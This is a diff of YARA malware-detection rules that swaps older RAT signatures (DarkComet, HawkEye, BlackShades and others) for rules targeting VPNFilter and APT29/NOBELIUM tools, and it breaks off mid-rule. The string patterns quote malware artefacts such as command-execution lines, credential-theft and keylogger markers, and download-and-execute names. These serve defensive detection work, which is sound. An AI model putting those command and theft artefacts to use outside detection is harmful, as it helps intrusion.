-		reference = "http://blog.cylance.com/a-study-in-bots-blackshades-net"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L144-L161"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_vpnfilter.yar#L11-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "23f8d52cf92b594f9302d549cf54f37dc0a01b5686da74b72120a8072435abfe"
+		logic_hash = "aff7b1f3d4afaf883c2702287ef7d6e13e01e80222ba336978d13deb21a93614"
 		score = 75
 		quality = 85
-		tags = "BLACKSHADES"
-		family = "blackshades"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f8286e29faa67ec765ae0244862f6b7914fcdde10423f96595cb84ad5cc6b344"
 
 	strings:
-		$string1 = "bss_server"
-		$string2 = "txtChat"
-		$string3 = "UDPFlood"
+		$s1 = "Login=" fullword ascii
+		$s2 = "Password=" fullword ascii
+		$s3 = "%s/rep_%u.bin" fullword ascii
+		$s4 = "%s:%uh->%s:%hu" fullword ascii
+		$s5 = "Password required" fullword ascii
+		$s6 = "password=" fullword ascii
+		$s7 = "Authorization: Basic" fullword ascii
+		$s8 = "/tmUnblock.cgi" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x457f and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_RAT_Bluebanana
+rule SIGNATURE_BASE_MAL_ELF_Vpnfilter_2 : FILE
 {
 	meta:
-		description = "Detects BlueBanana RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "f00c7e92-f34c-5666-a1d9-02ac2cf7608c"
-		date = "2014-01-04"
+		description = "Detects VPNFilter malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "95356303-e8ba-585d-b2fc-af9e10b0b93f"
+		date = "2018-05-24"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/BlueBanana"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L163-L184"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_vpnfilter.yar#L33-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0d84bb63d56d876c8b2e7c8c8afeaba839fee41d2d38f16ac9a13e802008179e"
+		logic_hash = "238ec4575fd8adbfa592e07b601313c71a08be8c776e78469aef8ad02e411798"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "Java"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "50ac4fcd3fbc8abcaa766449841b3a0a684b3e217fc40935f1ac22c34c58a9ec"
 
 	strings:
-		$meta = "META-INF"
-		$conf = "config.txt"
-		$a = "a/a/a/a/f.class"
-		$b = "a/a/a/a/l.class"
-		$c = "a/a/a/b/q.class"
-		$d = "a/a/a/b/v.class"
+		$s1 = "User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)" fullword ascii
+		$s2 = "passwordPASSWORDpassword" fullword ascii
+		$s3 = "/tmp/client.key" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x457f and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_RAT_Bozok
+rule SIGNATURE_BASE_MAL_ELF_Vpnfilter_3 : FILE
 {
 	meta:
-		description = "Detects Bozok RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "b1d22e8c-39aa-52e7-9ca8-2b35bb82f7de"
-		date = "2014-01-04"
+		description = "Detects VPNFilter malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "020603bf-fbce-5de1-82b9-5a2dfacfada3"
+		date = "2018-05-24"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Bozok"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L186-L206"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_vpnfilter.yar#L50-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9a2fcd11573654f0c91c0c0dec8938ca8319a23953a5043135cb0032562f9f53"
+		logic_hash = "71152b57f2d6040608febf32441e1899fdf2479335c26c1143ea58759e6d9094"
 		score = 75
-		quality = 75
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0e0094d9bd396a6594da8e21911a3982cd737b445f591581560d766755097d92"
+		hash2 = "9683b04123d7e9fe4c8c26c69b09c2233f7e1440f828837422ce330040782d17"
+		hash3 = "37e29b0ea7a9b97597385a12f525e13c3a7d02ba4161a6946f2a7d978cc045b4"
+		hash4 = "0649fda8888d701eb2f91e6e0a05a2e2be714f564497c44a3813082ef8ff250b"
+		hash5 = "4b03288e9e44d214426a02327223b5e516b1ea29ce72fa25a2fcef9aa65c4b0b"
+		hash6 = "8a20dc9538d639623878a3d3d18d88da8b635ea52e5e2d0c2cce4a8c5a703db1"
+		hash7 = "776cb9a7a9f5afbaffdd4dbd052c6420030b2c7c3058c1455e0a79df0e6f7a1d"
 
 	strings:
-		$a = "getVer" nocase
-		$b = "StartVNC" nocase
-		$c = "SendCamList" nocase
-		$d = "untPlugin" nocase
-		$e = "gethostbyname" nocase
+		$sx1 = "User-Agent: Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)" fullword ascii
+		$sx2 = "Execute by shell[%d]:" fullword ascii
+		$sx3 = "CONFIG.TOR.name:" fullword ascii
+		$s1 = "Executing command:  %s %s..." fullword ascii
+		$s2 = "/proc/%d/cmdline" fullword ascii
+		$a1 = "Mozilla/5.0 Firefox/50.0" fullword ascii
+		$a2 = "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0" fullword ascii
+		$a3 = "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x457f and filesize < 1000KB and ( 1 of ( $sx* ) or 2 of ( $s* ) or 2 of ( $a* ) )
 }
-rule SIGNATURE_BASE_RAT_Clientmesh : TORCT
+rule SIGNATURE_BASE_SUSP_ELF_Tor_Client : FILE
 {
 	meta:
-		description = "Detects ClientMesh RAT"
-		author = "Kevin Breen <kevin@techanarchy.net> (slightly modified by Florian Roth to improve performance)"
-		id = "351df33e-d3a1-5fe8-be38-edb43bc5d38f"
-		date = "2014-01-06"
+		description = "Detects VPNFilter malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1be6528d-1b60-50da-8125-2ef73b8aeb4f"
+		date = "2018-05-24"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/ClientMesh"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L208-L228"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_vpnfilter.yar#L80-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "671da9586110726b1646d4365ccaa87982ec7c86b7d4d80b99dbb444496b936c"
-		score = 75
+		logic_hash = "2b67b32c5b8441c9b38e3bfeefa7f59c2767e29985adcba7d52e858847d37e47"
+		score = 65
 		quality = 85
-		tags = "TORCT"
-		family = "torct"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "afd281639e26a717aead65b1886f98d6d6c258736016023b4e59de30b7348719"
 
 	strings:
-		$string1 = "machinedetails"
-		$string2 = "MySettings"
-		$string3 = "sendftppasswords"
-		$string4 = "sendbrowserpasswords"
-		$string5 = "arma2keyMass"
-		$string6 = "keylogger"
+		$x1 = "We needed to load a secret key from %s, but it was encrypted. Try 'tor --keygen' instead, so you can enter the passphrase." fullword ascii
+		$x2 = "Received a VERSION cell with odd payload length %d; closing connection." fullword ascii
+		$x3 = "Please upgrade! This version of Tor (%s) is %s, according to the directory authorities. Recommended versions are: %s" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x457f and 1 of them
 }
-rule SIGNATURE_BASE_RAT_Cybergate
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_JS_Envyscout_May21_1 : FILE
 {
 	meta:
-		description = "Detects CyberGate RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "387e7c89-c766-54cf-aac0-3ba03092bc25"
-		date = "2014-01-04"
-		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/CyberGate"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L230-L254"
+		description = "Detects EnvyScout deobfuscator code as used by NOBELIUM group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "42739aad-a88a-545b-8256-1f727c79c4f8"
+		date = "2021-05-29"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L56-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6b3861ae5e6bd6478e9d8024b0e67a3ac1dbf31083b77477364c55b51d0ed9b5"
+		logic_hash = "ad8a7bb5a1d2065e3a573842fb37ee3c63b7695c18840f0c26d32e6ae3d99c6c"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
 
 	strings:
-		$string1 = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23}
-		$string2 = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23}
-		$string3 = "EditSvr"
-		$string4 = "TLoader"
-		$string5 = "Stroks"
-		$string6 = "####@####"
-		$res1 = "XX-XX-XX-XX"
-		$res2 = "CG-CG-CG-CG"
+		$x1 = "[i].charCodeAt(0) ^ 2);}"
 
 	condition:
-		all of ( $string* ) and any of ( $res* )
+		filesize < 5000KB and 1 of them
 }
-rule SIGNATURE_BASE_RAT_Darkcomet
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_JS_Envyscout_May21_2 : FILE
 {
 	meta:
-		description = "Detects DarkComet RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "e6fd0269-dd0c-58c0-a1a3-24c2aed916ee"
-		date = "2014-01-04"
-		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/DarkComet"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L256-L282"
+		description = "Detects EnvyScout deobfuscator code as used by NOBELIUM group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d5cf3365-fe24-533a-a678-b5b6d4d99997"
+		date = "2021-05-29"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L69-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "db139f754f89affc706e090a41bfcd30cf49f9d4e16ade89993ee170f92cf68b"
+		logic_hash = "6f5c50b340d628559799897a2ba79add7d126e3ecb2daeb365bc15d64796ccd2"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
 
 	strings:
-		$a1 = "#BOT#URLUpdate"
-		$a2 = "Command successfully executed!"
-		$a3 = "MUTEXNAME" wide
-		$a4 = "NETDATA" wide
-		$b1 = "FastMM Borland Edition"
-		$b2 = "%s, ClassID: %s"
-		$b3 = "I wasn't able to open the hosts file"
-		$b4 = "#BOT#VisitUrl"
-		$b5 = "#KCMDDC"
+		$s1 = "saveAs(blob, " ascii
+		$s2 = ".iso\");" ascii
+		$s3 = "application/x-cd-image" ascii
+		$s4 = ".indexOf(\"Win\")!=-1" ascii
 
 	condition:
-		all of ( $a* ) or all of ( $b* )
+		filesize < 5000KB and all of them
 }
-rule SIGNATURE_BASE_RAT_Darkrat
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_LNK_NV_Link_May21_2 : FILE
 {
 	meta:
-		description = "Detects DarkRAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "8283236a-6ed1-5213-8386-a029867b9677"
-		date = "2014-01-04"
-		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/DarkRAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L284-L306"
+		description = "Detects NV Link as used by NOBELIUM group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "52c2caf9-13df-5614-9c9e-afcd76ec77f9"
+		date = "2021-05-29"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L85-L97"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dccb473a3cf4478dd1dbf8b35ad564f59740676ecde90266a0dc15cbad89bfe7"
+		logic_hash = "5eee9df368da3fc98c00a0f8c65a7f3bd5b812342082be58054b272b5bb03455"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
 
 	strings:
-		$a = "@1906dark1996coder@"
-		$b = "SHEmptyRecycleBinA"
-		$c = "mciSendStringA"
-		$d = "add_Shutdown"
-		$e = "get_SaveMySettingsOnExit"
-		$f = "get_SpecialDirectories"
-		$g = "Client.My"
+		$s1 = "RegisterOCX BOOM" ascii wide
+		$s2 = "cmd.exe /c start BOOM.exe" ascii wide
 
 	condition:
-		all of them
+		filesize < 5000KB and 1 of them
 }
-rule SIGNATURE_BASE_RAT_Greame
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_LNK_Samples_May21_1 : FILE
 {
 	meta:
-		description = "Detects Greame RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "b90d3747-407a-5552-971f-78ff78f827a6"
-		date = "2014-01-04"
-		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Greame"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L308-L331"
+		description = "Detects link file characteristics as described in APT29 NOBELIUM report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c807ab5a-f66a-5622-81b1-6e69b6df8446"
+		date = "2021-05-27"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L99-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4a1ce5f5847bdc01d286c1d9cd1e16ba2fd6b5bc56e6094cb1492882708e8e59"
-		score = 75
+		logic_hash = "32d76bb1af76f0fc2afb76d9726bc8ec99c4be34c9d46cebab7356d8c68af11c"
+		score = 85
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		hash1 = "24caf54e7c3fe308444093f7ac64d6d520c8f44ea4251e09e24931bdb72f5548"
 
 	strings:
-		$a = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23}
-		$b = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23}
-		$c = "EditSvr"
-		$d = "TLoader"
-		$e = "Stroks"
-		$f = "Avenger by NhT"
-		$g = "####@####"
-		$h = "GREAME"
+		$a1 = "rundll32.exe" wide
+		$sa1 = "IMGMountingService.dll" wide
+		$sa2 = "MountImgHelper" wide
+		$sb1 = "diassvcs.dll" wide
+		$sb2 = "InitializeComponent" wide
+		$sc1 = "MsDiskMountService.dll" wide
+		$sc2 = "DiskDriveIni" wide
+		$sd1 = "GraphicalComponent.dll" wide
+		$sd2 = "VisualServiceComponent" wide
+		$se1 = "data/mstu.dll,MicrosoftUpdateService" wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x004c and filesize < 4KB and $a1 and ( all of ( $sa* ) or all of ( $sb* ) or all of ( $sc* ) or all of ( $sd* ) or all of ( $se* ) )
 }
-rule SIGNATURE_BASE_RAT_Hawkeye
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Boombox_May21_1 : FILE
 {
 	meta:
-		description = "Detects HawkEye RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "22b1d1e6-feea-5f84-9564-326ad80bbd8d"
-		date = "2015-01-06"
-		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/HawkEye"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L333-L357"
+		description = "Detects BoomBox malware as described in APT29 NOBELIUM report"
+		author = "Florian Roth"
+		id = "1a14dcf7-81be-5a74-a530-caf6268d1976"
+		date = "2021-05-27"
+		modified = "2025-03-20"
+		reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L130-L161"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "db3a0fe5774f0d137e092a4eb9672a4518d0ef943a1a4619cb646a9ac9f74ee0"
-		score = 75
+		hash = "8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27"
+		logic_hash = "034ea34eb34ea6de0c65b9a7fc9d16f108ef34cd75294b022371ac17789c3830"
+		score = 85
 		quality = 85
-		tags = ""
-		maltype = "KeyLogger"
-		filetype = "exe"
+		tags = "FILE"
 
 	strings:
-		$key = "HawkEyeKeylogger" wide
-		$salt = "099u787978786" wide
-		$string1 = "HawkEye_Keylogger" wide
-		$string2 = "holdermail.txt" wide
-		$string3 = "wallet.dat" wide
-		$string4 = "Keylog Records" wide
-		$string5 = "<!-- do not script -->" wide
-		$string6 = "\\pidloc.txt" wide
-		$string7 = "BSPLIT" wide
+		$a1 = "]::FromBase64String($" ascii wide
+		$xa1 = "123do3y4r378o5t34onf7t3o573tfo73" ascii wide fullword
+		$xa2 = "1233t04p7jn3n4rg" ascii wide fullword
+		$s1 = "\\Release\\BOOM.pdb" ascii
+		$s2 = "/files/upload" ascii
+		$s3 = "/tmp/readme.pdf" ascii fullword
+		$s4 = "/new/{0}" ascii fullword
+		$s5 = "(&(objectClass=user)(objectCategory=person))"
 
 	condition:
-		$key and $salt and all of ( $string* )
+		( uint16( 0 ) == 0x5a4d or 1 of ( $a* ) ) and ( 1 of ( $x* ) or 3 of ( $s* ) )
 }
-rule SIGNATURE_BASE_RAT_Imminent
+
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Boombox_PDF_Masq_May21_1 : FILE
 {
 	meta:
-		description = "Detects Imminent RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "deddef60-c309-54e0-a488-ce937ed7eae3"
-		date = "2014-01-04"
-		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Imminent"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L359-L389"
+		description = "Detects PDF documents as used by BoomBox as described in APT29 NOBELIUM report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bdfb9600-edda-5c8c-ab23-14fb71c8e647"
+		date = "2021-05-27"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L163-L182"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aebae753c119950b0b3f315c7279866caf15f4d482c0a47912c90885adcf6db2"
-		score = 75
-		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		logic_hash = "8f1514648b2b797adfe3f8f5acb577c26707dfe1da942c9634be3d88a180a407"
+		score = 70
+		quality = 35
+		tags = "FILE"
 
 	strings:
-		$v1a = "DecodeProductKey"
-		$v1b = "StartHTTPFlood"
-		$v1c = "CodeKey"
-		$v1d = "MESSAGEBOX"
-		$v1e = "GetFilezillaPasswords"
-		$v1f = "DataIn"
-		$v1g = "UDPzSockets"
-		$v1h = {52 00 54 00 5F 00 52 00 43 00 44 00 41 00 54 00 41}
-		$v2a = "<URL>k__BackingField"
-		$v2b = "<RunHidden>k__BackingField"
-		$v2c = "DownloadAndExecute"
-		$v2d = "-CHECK & PING -n 2 127.0.0.1 & EXIT" wide
-		$v2e = "england.png" wide
-		$v2f = "Showed Messagebox" wide
+		$ah1 = { 25 50 44 46 2d 31 2e 33 0a 25 }
+		$af1 = { 0a 25 25 45 4f 46 0a }
+		$fp1 = "endobj" ascii
+		$fp2 = "endstream" ascii
+		$fp3 = { 20 6F 62 6A 0A }
 
 	condition:
-		all of ( $v1* ) or all of ( $v2* )
+		$ah1 at 0 and $af1 at ( filesize -7 ) and filesize < 100KB and not 1 of ( $fp* ) and math.entropy ( 16 , filesize ) > 7
 }
-rule SIGNATURE_BASE_RAT_Infinity
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Nativezone_Loader_May21_1 : FILE
 {
 	meta:
-		description = "Detects Infinity RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "b70f9459-fa84-516f-841d-d9617856eb4d"
-		date = "2014-01-04"
-		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Infinity"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L391-L414"
+		description = "Detects NativeZone loader as described in APT29 NOBELIUM report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "02d9257d-f439-5071-96b0-a973b088e329"
+		date = "2021-05-27"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L184-L204"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c1f5381755af6cfbb10a4769757cdeffb9651bddc76bc4c8e9765ed44bf37fe6"
-		score = 75
+		logic_hash = "a02fd6fcd7423781bbd2e4458bd61d28e16a5b1a73b1682e63db5c86d53c7da4"
+		score = 85
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		hash1 = "136f4083b67bc8dc999eb15bb83042aeb01791fc0b20b5683af6b4ddcf0bbc7d"
 
 	strings:
-		$a = "CRYPTPROTECT_PROMPTSTRUCT"
-		$b = "discomouse"
-		$c = "GetDeepInfo"
-		$d = "AES_Encrypt"
-		$e = "StartUDPFlood"
-		$f = "BATScripting" wide
-		$g = "FBqINhRdpgnqATxJ.html" wide
-		$i = "magic_key" wide
+		$s1 = "\\SystemCertificates\\Lib\\CertPKIProvider.dll" ascii
+		$s2 = "rundll32.exe %s %s" ascii fullword
+		$s3 = "eglGetConfigs" ascii fullword
+		$op1 = { 80 3d 74 8c 01 10 00 0f 85 96 00 00 00 33 c0 40 b9 6c 8c 01 10 87 01 33 db 89 5d fc }
+		$op2 = { 8b 46 18 e9 30 ff ff ff 90 87 2f 00 10 90 2f 00 10 }
+		$op3 = { e8 14 dd ff ff 8b f1 80 3d 74 8c 01 10 00 0f 85 96 00 00 00 33 c0 40 b9 6c 8c 01 10 87 01 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 3 of them or 4 of them
 }
-rule SIGNATURE_BASE_RAT_Lostdoor
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Boombox_May21_2 : FILE
 {
 	meta:
-		description = "Detects LostDoor RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "f86ae7a1-2182-5b2e-8f9e-9e8456f574bc"
-		date = "2014-01-04"
-		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/LostDoor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L440-L465"
+		description = "Detects BoomBox malware used by APT29 / NOBELIUM"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a4144c00-48b2-5520-b773-5d0a5de95fb1"
+		date = "2021-05-29"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L206-L234"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7ffa6f5cbeacca5a1e750e35d8296658d4e280078a61f94fd5f2d4b7c800bb44"
+		logic_hash = "2a3829e704af2464639d07e8e7952669281e20cf2a7ac487d5d1eee021d08b35"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		hash1 = "0acb884f2f4cfa75b726cb8290b20328c8ddbcd49f95a1d761b7d131b95bafec"
+		hash2 = "8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27"
+		hash3 = "cf1d992f776421f72eabc31d5afc2f2067ae856f1c9c1d6dc643a67cb9349d8c"
 
 	strings:
-		$a0 = {0D 0A 2A 45 44 49 54 5F 53 45 52 56 45 52 2A 0D 0A}
-		$a1 = "*mlt* = %"
-		$a2 = "*ip* = %"
-		$a3 = "*victimo* = %"
-		$a4 = "*name* = %"
-		$b5 = "[START]"
-		$b6 = "[DATA]"
-		$b7 = "We Control Your Digital World" wide ascii
-		$b8 = "RC4Initialize" wide ascii
-		$b9 = "RC4Decrypt" wide ascii
+		$x1 = "\\Microsoft\\NativeCache\\NativeCacheSvc.dll" wide
+		$x2 = "\\NativeCacheSvc.dll _configNativeCache" wide
+		$a1 = "/content.dropboxapi.com" wide fullword
+		$s1 = "rundll32.exe {0} {1}" wide fullword
+		$s2 = "\\\\CertPKIProvider.dll" wide
+		$s3 = "/tmp/readme.pdf" wide
+		$s4 = "temp/[^\"]*)\"" wide fullword
+		$op1 = { 00 78 00 2d 00 41 00 50 00 49 00 2d 00 41 00 72 00 67 00 01 2f 4f 00 72 00 }
+		$op2 = { 25 72 98 01 00 70 6f 34 00 00 0a 25 6f 35 00 00 0a 72 71 02 00 70 72 }
+		$op3 = { 4d 05 20 00 12 80 91 04 20 01 08 0e 04 20 00 12 }
 
 	condition:
-		all of ( $a* ) or all of ( $b* )
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and 3 of them or 4 of them
 }
-rule SIGNATURE_BASE_RAT_Luminositylink
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Malware_May21_2 : FILE
 {
 	meta:
-		description = "Detects LuminosityLink RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "163fe10c-38a1-53d3-b3a5-4240229e0306"
-		date = "2014-01-04"
-		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/LuminosityLink"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L467-L493"
+		description = "Detects malware used by APT29 / NOBELIUM"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b1462b4b-227f-5aeb-92ea-bda6a86831c7"
+		date = "2021-05-29"
+		modified = "2025-03-21"
